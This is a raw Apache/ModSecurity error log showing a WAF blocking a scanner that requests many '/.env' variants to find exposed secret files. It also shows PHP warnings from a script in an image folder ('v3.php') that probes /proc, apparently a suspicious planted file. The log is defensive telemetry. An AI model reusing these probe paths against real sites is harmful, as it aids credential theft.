[Mon May 11 16:54:13.091543 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.docker"] [unique_id "agHtlYW8yzYoWG_eyCWh3wAAAVI"]
[Mon May 11 16:54:13.129309 2026] [authz_core:error] [pid 1412074:tid 1412094] [client 75.119.155.172:5134] AH01630: client denied by server configuration: /home/castigli/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/ruckusing/lib/Ruckusing/Adapter/PgSQL/error_log
PHP Warning:  filesize(): stat failed for /proc/850/task/850/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/850/task/850/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/850/task/850/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/850/task/850/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/850/task/850/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/850/task/850/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 16:54:13.273390 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.live"] [unique_id "agHtlYW8yzYoWG_eyCWh4QAAAVI"]
[Mon May 11 16:54:13.273605 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.live"] [unique_id "agHtlYW8yzYoWG_eyCWh4QAAAVI"]
[Mon May 11 16:54:13.273838 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.live"] [unique_id "agHtlYW8yzYoWG_eyCWh4QAAAVI"]
[Mon May 11 16:54:13.401903 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.preprod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.preprod"] [unique_id "agHtlYW8yzYoWG_eyCWh4gAAAVI"]
[Mon May 11 16:54:13.402125 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.preprod"] [unique_id "agHtlYW8yzYoWG_eyCWh4gAAAVI"]
[Mon May 11 16:54:13.402397 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.preprod"] [unique_id "agHtlYW8yzYoWG_eyCWh4gAAAVI"]
[Mon May 11 16:54:13.578335 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.uat"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.uat"] [unique_id "agHtlYW8yzYoWG_eyCWh5AAAAVI"]
[Mon May 11 16:54:13.578560 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.uat"] [unique_id "agHtlYW8yzYoWG_eyCWh5AAAAVI"]
[Mon May 11 16:54:13.578786 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.uat"] [unique_id "agHtlYW8yzYoWG_eyCWh5AAAAVI"]
[Mon May 11 16:54:13.786137 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.dist"] [unique_id "agHtlYW8yzYoWG_eyCWh5QAAAVI"]
[Mon May 11 16:54:13.786365 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.dist"] [unique_id "agHtlYW8yzYoWG_eyCWh5QAAAVI"]
[Mon May 11 16:54:13.786608 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.dist"] [unique_id "agHtlYW8yzYoWG_eyCWh5QAAAVI"]
[Mon May 11 16:54:13.941576 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.swp"] [unique_id "agHtlYW8yzYoWG_eyCWh5wAAAVI"]
[Mon May 11 16:54:13.941792 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.swp"] [unique_id "agHtlYW8yzYoWG_eyCWh5wAAAVI"]
[Mon May 11 16:54:13.942027 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.swp"] [unique_id "agHtlYW8yzYoWG_eyCWh5wAAAVI"]
[Mon May 11 16:54:14.122351 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env~"] [unique_id "agHtloW8yzYoWG_eyCWh6QAAAVI"]
[Mon May 11 16:54:14.122561 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env~"] [unique_id "agHtloW8yzYoWG_eyCWh6QAAAVI"]
[Mon May 11 16:54:14.122769 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env~"] [unique_id "agHtloW8yzYoWG_eyCWh6QAAAVI"]
[Mon May 11 16:54:14.277683 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env1"] [unique_id "agHtloW8yzYoWG_eyCWh6gAAAVI"]
[Mon May 11 16:54:14.277900 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env1"] [unique_id "agHtloW8yzYoWG_eyCWh6gAAAVI"]
[Mon May 11 16:54:14.278149 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env1"] [unique_id "agHtloW8yzYoWG_eyCWh6gAAAVI"]
[Mon May 11 16:54:14.432104 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env2"] [unique_id "agHtloW8yzYoWG_eyCWh7AAAAVI"]
[Mon May 11 16:54:14.432339 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env2"] [unique_id "agHtloW8yzYoWG_eyCWh7AAAAVI"]
[Mon May 11 16:54:14.432562 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env2"] [unique_id "agHtloW8yzYoWG_eyCWh7AAAAVI"]
[Mon May 11 16:54:14.508330 2026] [authz_core:error] [pid 1411099:tid 1411122] [client 75.119.155.172:5148] AH01630: client denied by server configuration: /home/castigli/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/ruckusing/lib/Ruckusing/Adapter/PgSQL/error_log
[Mon May 11 16:54:14.566510 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_copy"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env_copy"] [unique_id "agHtloW8yzYoWG_eyCWh7QAAAVI"]
[Mon May 11 16:54:14.566715 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env_copy"] [unique_id "agHtloW8yzYoWG_eyCWh7QAAAVI"]
[Mon May 11 16:54:14.566949 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env_copy"] [unique_id "agHtloW8yzYoWG_eyCWh7QAAAVI"]
[Mon May 11 16:54:14.710843 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.txt"] [unique_id "agHtloW8yzYoWG_eyCWh7wAAAVI"]
[Mon May 11 16:54:14.711098 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.txt"] [unique_id "agHtloW8yzYoWG_eyCWh7wAAAVI"]
[Mon May 11 16:54:14.711383 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.txt"] [unique_id "agHtloW8yzYoWG_eyCWh7wAAAVI"]
[Mon May 11 16:54:14.970851 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.json"] [unique_id "agHtloW8yzYoWG_eyCWh8QAAAVI"]
[Mon May 11 16:54:14.971015 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.json"] [unique_id "agHtloW8yzYoWG_eyCWh8QAAAVI"]
[Mon May 11 16:54:14.971251 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.json"] [unique_id "agHtloW8yzYoWG_eyCWh8QAAAVI"]
[Mon May 11 16:54:15.215487 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.yaml"] [unique_id "agHtl4W8yzYoWG_eyCWh8wAAAVI"]
[Mon May 11 16:54:15.215696 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.yaml"] [unique_id "agHtl4W8yzYoWG_eyCWh8wAAAVI"]
[Mon May 11 16:54:15.215912 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.yaml"] [unique_id "agHtl4W8yzYoWG_eyCWh8wAAAVI"]
[Mon May 11 16:54:15.370445 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.yml"] [unique_id "agHtl4W8yzYoWG_eyCWh9QAAAVI"]
